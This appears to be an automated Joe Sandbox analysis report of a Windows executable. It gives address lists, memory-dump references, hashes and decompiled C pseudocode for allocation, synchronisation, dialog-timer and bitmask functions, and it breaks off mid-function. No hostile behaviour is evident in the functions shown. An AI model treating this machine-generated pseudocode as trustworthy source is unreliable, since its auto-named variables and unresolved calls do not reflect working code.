                              0x00414821
                              0x00414821
                              0x004147fa
                              0x004147e4
                              0x00414839
                              0x00414839
                              0x00414839
                              0x0041483d
                              0x0041483d
                              0x00414842
                              0x00414845
                              0x00414847
                              0x00000000
                              0x00000000
                              0x00414849
                              0x0041484f
                              0x00000000
                              0x00000000
                              0x00414852
                              0x00414858
                              0x0041485a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00414860
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004145ea
                              0x004145ea
                              0x004145ea
                              0x004145ed
                              0x004145f0
                              0x004146e7
                              0x004146e7
                              0x004146ea
                              0x004146ec
                              0x00000000
                              0x00000000
                              0x004146f2
                              0x004146f8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004146f8
                              0x004145f8
                              0x004145fe
                              0x00414602
                              0x00414608
                              0x0041460b
                              0x0041460d
                              0x004146b7
                              0x004146b7
                              0x004146bb
                              0x004146c0
                              0x004146c3
                              0x004146c5
                              0x004146c7
                              0x004146cb
                              0x004146cb
                              0x004146cf
                              0x004146cf
                              0x004146d2
                              0x004146e4
                              0x004146e4
                              0x00000000
                              0x004146c3
                              0x00414613
                              0x00414619
                              0x0041461b
                              0x0041461c
                              0x0041461d
                              0x0041461e
                              0x00414623
                              0x00414626
                              0x00414628
                              0x0041462f
                              0x00414630
                              0x00414636
                              0x00414639
                              0x0041463b
                              0x00414640
                              0x00414641
                              0x00414644
                              0x00414646
                              0x00414648
                              0x00414648
                              0x0041464f
                              0x00414655
                              0x0041465a
                              0x0041465d
                              0x0041465e
                              0x0041465f
                              0x00414664
                              0x00414664
                              0x0041462a
                              0x0041462a
                              0x0041462a
                              0x00414628
                              0x00414667
                              0x0041466a
                              0x0041466c
                              0x0041466e
                              0x00414672
                              0x00414673
                              0x00414673
                              0x00414679
                              0x0041467c
                              0x00414687
                              0x0041468d
                              0x00414690
                              0x00414692
                              0x00414697
                              0x00414698
                              0x0041469b
                              0x0041469d
                              0x0041469f
                              0x0041469f
                              0x004146a6
                              0x004146ab
                              0x004146ac
                              0x004146af
                              0x004146b4
                              0x004146b4
                              0x00414692
                              0x00000000
                              0x004146fe
                              0x004146ff
                              0x00414705
                              0x00414705
                              0x00000000
                              0x004145d0
                              0x004145d1
                              0x004148ad
                              0x004148ad
                              0x004148ad
                              0x00000000
                              0x004148ad
                              0x004145bb
                              0x004145be
                              0x004148af
                              0x004148b2
                              0x004148bd
                              0x004148bd

                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                              • Instruction ID: b0a20c71c01645f6642c62949d543ab21d76ee58160ce25a59b39075e73dd19d
                              • Opcode Fuzzy Hash: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                              • Instruction Fuzzy Hash: 4691E671D01514ABCB21AB69DC85ADEBBB4EFC5764F240227F818B62D0D7398DC1CA6C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041659C Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0041659C() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x420828 != 0xffffffff) {
					_t43 = HeapAlloc( *0x425a34, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x420818;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x420818) {
							HeapFree( *0x425a34, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x420818) {
						 *_t43 = 0x420818;
						_t25 =  *0x42081c; // 0x420818
						 *(_t43 + 4) = _t25;
						 *0x42081c = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x420818 == 0) {
							 *0x420818 = 0x420818;
						}
						if( *0x42081c == 0) {
							 *0x42081c = 0x420818;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E00417DA0(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}









                              0x004165a7
                              0x004165c3
                              0x004165c7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004165a9
                              0x004165a9
                              0x004165cd
                              0x004165e3
                              0x004165e7
                              0x004166c2
                              0x004166c8
                              0x004166d3
                              0x004166d3
                              0x004166d9
                              0x00000000
                              0x004166d9
                              0x004165ff
                              0x004166bc
                              0x00000000
                              0x004166bc
                              0x0041660c
                              0x0041662c
                              0x0041662e
                              0x00416633
                              0x00416636
                              0x0041663f
                              0x0041660e
                              0x00416615
                              0x00416617
                              0x00416617
                              0x00416623
                              0x00416625
                              0x00416625
                              0x00416623
                              0x00416641
                              0x00416647
                              0x0041664d
                              0x00416650
                              0x00416650
                              0x00416653
                              0x00416656
                              0x00416659
                              0x0041665c
                              0x00416663
                              0x00416665
                              0x0041666f
                              0x00416670
                              0x00416672
                              0x00416675
                              0x00416678
                              0x00416684
                              0x0041668c
                              0x00416695
                              0x0041669c
                              0x0041669f
                              0x004166a1
                              0x004166a8
                              0x004166a8
                              0x00000000
                              0x004166b0

                              APIs
                              • HeapAlloc.KERNEL32(00000000,00002020,00420818,00420818,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165BD
                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165E1
                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165FB
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?), ref: 004166BC
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?,00000000), ref: 004166D3
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: AllocVirtual$FreeHeap
                              • String ID:
                              • API String ID: 714016831-0
                              • Opcode ID: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                              • Instruction ID: 0af9858cac0a30669fb94f5f64461d90f8de944a7195c69e4f59e8ed45fdce2d
                              • Opcode Fuzzy Hash: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                              • Instruction Fuzzy Hash: 983101B0700705EBD3309F24EC45BA2BBE4EB44794F12823AE55597791E778E8818BCC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00409787 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E00409787(void* __ecx, void* __edx) {
				signed int _t48;
				intOrPtr* _t54;
				signed int _t60;
				intOrPtr _t61;
				void* _t76;
				struct _CRITICAL_SECTION* _t80;
				signed int _t81;
				void* _t84;
				void* _t86;

				_t76 = __edx;
				E00413954(E00419CC0, _t86);
				_t84 = __ecx;
				_t80 = __ecx + 0x40;
				if(E004095DD(_t80) == 0) {
					E0040998D(__ecx);
					EnterCriticalSection(_t80);
					_t60 =  *(_t80 + 0x20);
					 *(_t86 - 0x10) =  *(_t80 + 0x24);
					 *((intOrPtr*)(_t86 - 0x20)) =  *((intOrPtr*)(_t80 + 0x28));
					 *((intOrPtr*)(_t86 - 0x1c)) =  *((intOrPtr*)(_t80 + 0x2c));
					LeaveCriticalSection(_t80);
					if(_t60 !=  *((intOrPtr*)(_t84 + 0x28)) ||  *(_t86 - 0x10) !=  *((intOrPtr*)(_t84 + 0x2c))) {
						E0040969B(_t84, _t60,  *(_t86 - 0x10));
					}
					E0040970E(_t84,  *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)));
					_t81 = 0;
					if((_t60 |  *(_t86 - 0x10)) == 0) {
						 *(_t86 - 0x10) = _t81;
						_t60 = 1;
					}
					_t61 = E00413D80(E00414490( *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)), 0x64, _t81), _t76, _t60,  *(_t86 - 0x10));
					if(_t61 !=  *((intOrPtr*)(_t84 + 0x34))) {
						asm("cdq");
						E00403A0B(_t86 - 0xa4, _t76, _t47, _t76);
						E00401C80(_t86 - 0x18, _t86 - 0xa4);
						 *(_t86 - 4) = _t81;
						E00407D25(_t86 - 0x18, _t76, L"% ");
						_push(_t84 + 0xc);
						_t54 = E00402634(_t86 - 0x24, _t86 - 0x18);
						 *(_t86 - 4) = 1;
						E00406049( *((intOrPtr*)(_t84 + 4)),  *_t54);
						E00403A9C( *((intOrPtr*)(_t86 - 0x24)));
						 *((intOrPtr*)(_t84 + 0x34)) = _t61;
						E00403A9C( *((intOrPtr*)(_t86 - 0x18)));
					}
					_t48 = 1;
				} else {
					_t48 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0xc));
				return _t48;
			}












                              0x00409787
                              0x0040978c
                              0x00409798
                              0x0040979b
                              0x004097a7
                              0x004097b3
                              0x004097b9
                              0x004097c2
                              0x004097c5
                              0x004097cb
                              0x004097d2
                              0x004097d5
                              0x004097de
                              0x004097ee
                              0x004097ee
                              0x004097fb
                              0x00409807
                              0x00409808
                              0x0040980c
                              0x0040980f
                              0x0040980f
                              0x00409829
                              0x0040982e
                              0x00409830
                              0x00409839
                              0x00409848
                              0x00409855
                              0x00409858
                              0x00409863
                              0x00409867
                              0x00409871
                              0x00409875
                              0x0040987d
                              0x00409885
                              0x00409888
                              0x0040988e
                              0x0040988f
                              0x004097a9
                              0x004097a9
                              0x004097a9
                              0x00409897
                              0x0040989f

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040978C
                                • Part of subcall function 004095DD: EnterCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095E2
                                • Part of subcall function 004095DD: LeaveCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095EC
                              • EnterCriticalSection.KERNEL32(?), ref: 004097B9
                              • LeaveCriticalSection.KERNEL32(?), ref: 004097D5
                              • __aulldiv.LIBCMT ref: 00409824
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave$H_prolog__aulldiv
                              • String ID:
                              • API String ID: 3848147900-0
                              • Opcode ID: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                              • Instruction ID: 0a470d0c852558693c62499fef9fcf54cb9603282822d0262474d13d459b1607
                              • Opcode Fuzzy Hash: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                              • Instruction Fuzzy Hash: D2316076A00219AFCB10EFA1C881AEFBBB5FF48314F00442EE10573692CB79AD45CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004095F7 Relevance: 6.0, APIs: 4, Instructions: 37windowtimeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004095F7(void* __ecx) {
				void* _t32;

				_t32 = __ecx;
				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
				 *(__ecx + 0x34) =  *(__ecx + 0x34) | 0xffffffff;
				 *((char*)(__ecx + 0x38)) = 1;
				E00413260(__ecx + 0x3c);
				 *((intOrPtr*)(_t32 + 0x30)) = GetDlgItem( *(__ecx + 4), 0x3e8);
				if( *(_t32 + 0x70) >= 0) {
					SendMessageA( *(_t32 + 4), 0x80, 1, LoadIconA( *0x423144,  *(_t32 + 0x70) & 0x0000ffff));
				}
				 *((intOrPtr*)(_t32 + 8)) = SetTimer( *(_t32 + 4), 3, 0x64, 0);
				E00406049( *(_t32 + 4),  *((intOrPtr*)(_t32 + 0xc)));
				E0040998D(_t32);
				return 1;
			}




                              0x004095f8
                              0x004095fa
                              0x004095fe
                              0x00409602
                              0x00409609
                              0x0040960d
                              0x00409624
                              0x00409627
                              0x00409645
                              0x00409645
                              0x00409660
                              0x00409663
                              0x0040966a
                              0x00409672

                              APIs
                                • Part of subcall function 00413260: SetEvent.KERNEL32(00000000,00407649), ref: 00413263
                              • GetDlgItem.USER32 ref: 0040961A
                              • LoadIconA.USER32 ref: 00409634
                              • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00409645
                              • SetTimer.USER32 ref: 00409654
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: EventIconItemLoadMessageSendTimer
                              • String ID:
                              • API String ID: 2758541657-0
                              • Opcode ID: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                              • Instruction ID: 551790b6ae67963d7c94afa5d69916b6b09ae611f895d6b9f891aac7cfc7161a
                              • Opcode Fuzzy Hash: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                              • Instruction Fuzzy Hash: AF010830140B00AFD7219B21DD5AB66BBA1BF04721F008B2DE9A7959E0CB76B951CB48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D7CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040D7CC(void* __ecx) {
				signed int _t118;
				signed int _t129;
				signed int* _t130;
				signed int _t150;
				signed int _t151;
				signed int _t160;
				intOrPtr _t162;
				signed int* _t180;
				signed int _t181;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				intOrPtr _t198;
				void* _t200;
				signed int* _t202;
				void* _t203;

				E00413954(E0041A61C, _t203);
				_t200 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
					L31:
					_t118 = 0;
				} else {
					E004032A8(_t203 - 0x28, 1);
					 *((intOrPtr*)(_t203 - 0x28)) = 0x41b748;
					_t150 = 0;
					 *(_t203 - 4) = 0;
					E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
					_t190 = 0;
					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
						L5:
						_t191 = 0;
						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
							L8:
							E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
							_t192 = 0;
							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
								L11:
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E004042AD(_t203 - 0x28);
								_t160 = 0x20;
								memset(_t203 - 0xd0, 0, _t160 << 2);
								_t162 = 4;
								 *(_t203 - 0x38) = _t150;
								 *(_t203 - 0x34) = _t150;
								 *(_t203 - 0x30) = _t150;
								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
								 *((intOrPtr*)(_t203 - 0x3c)) = 0x41b378;
								 *(_t203 - 4) = 1;
								 *(_t203 - 0x4c) = _t150;
								 *(_t203 - 0x48) = _t150;
								 *(_t203 - 0x44) = _t150;
								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
								 *((intOrPtr*)(_t203 - 0x50)) = 0x41b378;
								 *(_t203 - 4) = 2;
								 *(_t203 - 0x10) = _t150;
								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
									do {
										 *(_t203 - 0x14) = _t150;
										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
											do {
												E004039DF(_t203 - 0x3c,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
										}
										 *(_t203 - 0x14) = _t150;
										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
											do {
												E004039DF(_t203 - 0x50,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
								}
								_t195 = 0;
								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
									do {
										_t151 = 1;
										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
										_t195 = _t195 + 1;
									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
									_t150 = 0;
								}
								 *(_t203 - 4) = 1;
								E004042AD(_t203 - 0x50);
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E004042AD(_t203 - 0x3c);
								_t180 = _t203 - 0xd0;
								 *(_t203 - 0x14) = 0x20;
								do {
									 *(_t203 - 0x10) = _t150;
									_t202 = _t203 - 0xd0;
									do {
										_t129 =  *_t180;
										_t196 = 1;
										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
											 *_t180 = _t129 |  *_t202;
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
										_t202 =  &(_t202[1]);
									} while ( *(_t203 - 0x10) < 0x20);
									_t180 =  &(_t180[1]);
									_t106 = _t203 - 0x14;
									 *_t106 =  *(_t203 - 0x14) - 1;
								} while ( *_t106 != 0);
								_t130 = _t203 - 0xd0;
								while(1) {
									_t181 = 1;
									if(( *_t130 & _t181 << _t150) != 0) {
										goto L31;
									}
									_t150 = _t150 + 1;
									_t130 =  &(_t130[1]);
									if(_t150 < 0x20) {
										continue;
									} else {
										_t118 = 1;
									}
									goto L32;
								}
								goto L31;
							} else {
								while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
									_t192 = _t192 + 1;
									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
										continue;
									} else {
										goto L11;
									}
									goto L32;
								}
								goto L30;
							}
						} else {
							while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
								_t191 = _t191 + 1;
								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
									continue;
								} else {
									goto L8;
								}
								goto L32;
							}
							goto L30;
						}
					} else {
						while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
							_t190 = _t190 + 1;
							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
								continue;
							} else {
								goto L5;
							}
							goto L32;
						}
						L30:
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						E004042AD(_t203 - 0x28);
						goto L31;
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
				return _t118;
			}





















                              0x0040d7d1
                              0x0040d7de
                              0x0040d7e7
                              0x0040d9e8
                              0x0040d9e8
                              0x0040d7f7
                              0x0040d7fc
                              0x0040d801
                              0x0040d80e
                              0x0040d816
                              0x0040d819
                              0x0040d81e
                              0x0040d823
                              0x0040d841
                              0x0040d841
                              0x0040d846
                              0x0040d864
                              0x0040d86a
                              0x0040d86f
                              0x0040d874
                              0x0040d893
                              0x0040d893
                              0x0040d89a
                              0x0040d8a3
                              0x0040d8aa
                              0x0040d8b3
                              0x0040d8b4
                              0x0040d8b7
                              0x0040d8ba
                              0x0040d8bd
                              0x0040d8c0
                              0x0040d8c3
                              0x0040d8ca
                              0x0040d8cd
                              0x0040d8d0
                              0x0040d8d3
                              0x0040d8d6
                              0x0040d8dc
                              0x0040d8e0
                              0x0040d8e3
                              0x0040d8e5
                              0x0040d8eb
                              0x0040d8ee
                              0x0040d8f4
                              0x0040d8f6
                              0x0040d8fc
                              0x0040d901
                              0x0040d907
                              0x0040d8f6
                              0x0040d90f
                              0x0040d912
                              0x0040d914
                              0x0040d91a
                              0x0040d91f
                              0x0040d925
                              0x0040d914
                              0x0040d92a
                              0x0040d930
                              0x0040d8e5
                              0x0040d935
                              0x0040d93a
                              0x0040d93c
                              0x0040d94a
                              0x0040d960
                              0x0040d962
                              0x0040d963
                              0x0040d968
                              0x0040d968
                              0x0040d96d
                              0x0040d971
                              0x0040d976
                              0x0040d97d
                              0x0040d982
                              0x0040d988
                              0x0040d98f
                              0x0040d98f
                              0x0040d992
                              0x0040d998
                              0x0040d99b
                              0x0040d99f
                              0x0040d9a4
                              0x0040d9a8
                              0x0040d9a8
                              0x0040d9aa
                              0x0040d9ad
                              0x0040d9b0
                              0x0040d9b6
                              0x0040d9b9
                              0x0040d9b9
                              0x0040d9b9
                              0x0040d9be
                              0x0040d9c4
                              0x0040d9c8
                              0x0040d9cd
                              0x00000000
                              0x00000000
                              0x0040d9cf
                              0x0040d9d0
                              0x0040d9d6
                              0x00000000
                              0x0040d9d8
                              0x0040d9d8
                              0x0040d9d8
                              0x00000000
                              0x0040d9d6
                              0x00000000
                              0x0040d876
                              0x0040d876
                              0x0040d88d
                              0x0040d891
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040d891
                              0x00000000
                              0x0040d876
                              0x0040d848
                              0x0040d848
                              0x0040d85e
                              0x0040d862
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040d862
                              0x00000000
                              0x0040d848
                              0x0040d825
                              0x0040d825
                              0x0040d83b
                              0x0040d83f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040d83f
                              0x0040d9dc
                              0x0040d9dc
                              0x0040d9e3
                              0x00000000
                              0x0040d9e3
                              0x0040d823
                              0x0040d9ea
                              0x0040d9f0
                              0x0040d9f8

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $
                              • API String ID: 3519838083-227171996
                              • Opcode ID: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                              • Instruction ID: b608afa5533618173c50a936dd0dc92eebd328cd23ff399218f1dfb4b0bc6294
                              • Opcode Fuzzy Hash: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                              • Instruction Fuzzy Hash: 6A713571E0020A9FCB24DF99D481AAEB7B1FF48314F10457ED416B7691D734AA8ACF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00403D5A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152COMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E00403D5A(intOrPtr* __ecx, intOrPtr __edx) {
				void* __edi;
				void* _t69;
				signed int _t70;
				intOrPtr _t79;
				intOrPtr _t90;
				signed int _t91;
				char _t98;
				char _t116;
				intOrPtr* _t136;
				void* _t138;

				E00413954(E004194DC, _t138);
				_t136 = __ecx;
				 *((intOrPtr*)(_t138 - 0x20)) = __edx;
				E004042D6();
				 *((intOrPtr*)(_t138 - 0x10)) = 0;
				while(1) {
					L1:
					_t69 = E00403FE2(_t136, _t138 - 0x10);
					_t146 = _t69;
					if(_t69 == 0) {
						break;
					}
					E00402EE1(_t138 - 0x50);
					 *(_t138 - 4) = 0;
					E00402EE1(_t138 - 0x44);
					_t7 = _t138 - 0x14; // 0x414be4
					 *(_t138 - 4) = 1;
					E00403F3C(_t138 - 0x38,  *_t136 +  *((intOrPtr*)(_t138 - 0x10)));
					 *(_t138 - 4) = 2;
					if(E0040411F(_t138 - 0x38, _t138 - 0x50, _t146) == 0) {
						L26:
						E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
						E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
						E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
						L28:
						_t70 = 0;
						__eflags = 0;
						L29:
						 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
						return _t70;
					}
					_t15 = _t138 - 0x14; // 0x414be4
					_t79 =  *_t15;
					if(_t79 == 0) {
						goto L26;
					}
